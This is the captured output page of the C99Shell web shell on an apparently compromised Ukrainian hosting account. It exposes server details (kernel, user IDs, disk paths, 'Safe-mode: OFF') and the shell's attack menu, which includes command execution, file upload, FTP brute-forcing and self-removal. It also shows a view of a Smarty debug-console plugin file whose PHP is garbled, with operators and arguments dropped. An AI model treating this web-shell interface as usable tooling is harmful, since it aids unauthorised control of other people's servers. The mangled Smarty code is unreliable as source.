!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/zt-tsou.org.ua/smarty/internals/   drwxr-xr-x
Free 106.79 GB of 200.55 GB (53.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     core.display_debug_console.php (1.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Smarty plugin
 * @package Smarty
 * @subpackage plugins
 */

/**
 * Smarty debug_console function plugin
 *
 * Type:     core<br>
 * Name:     display_debug_console<br>
 * Purpose:  display the javascript debug console window
 * @param array Format: null
 * @param Smarty
 */
function smarty_core_display_debug_console($params, &$smarty)
{
    
// we must force compile the debug template in case the environment
    // changed between separate applications.

    
if(empty($smarty->debug_tpl)) {
        
// set path to debug template from SMARTY_DIR
        
$smarty->debug_tpl SMARTY_DIR 'debug.tpl';
        if(
$smarty->security && is_file($smarty->debug_tpl)) {
            
$smarty->secure_dir[] = realpath($smarty->debug_tpl);
        }
        
$smarty->debug_tpl 'file:' SMARTY_DIR 'debug.tpl';
    }

    
$_ldelim_orig $smarty->left_delimiter;
    
$_rdelim_orig $smarty->right_delimiter;

    
$smarty->left_delimiter '{';
    
$smarty->right_delimiter '}';

    
$_compile_id_orig $smarty->_compile_id;
    
$smarty->_compile_id null;

    
$_compile_path $smarty->_get_compile_path($smarty->debug_tpl);
    if (
$smarty->_compile_resource($smarty->debug_tpl$_compile_path))
    {
        
ob_start();
        
$smarty->_include($_compile_path);
        
$_results ob_get_contents();
        
ob_end_clean();
    } else {
        
$_results '';
    }

    
$smarty->_compile_id $_compile_id_orig;

    
$smarty->left_delimiter $_ldelim_orig;
    
$smarty->right_delimiter $_rdelim_orig;

    return 
$_results;
}

/* vim: set expandtab: */

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0249 ]--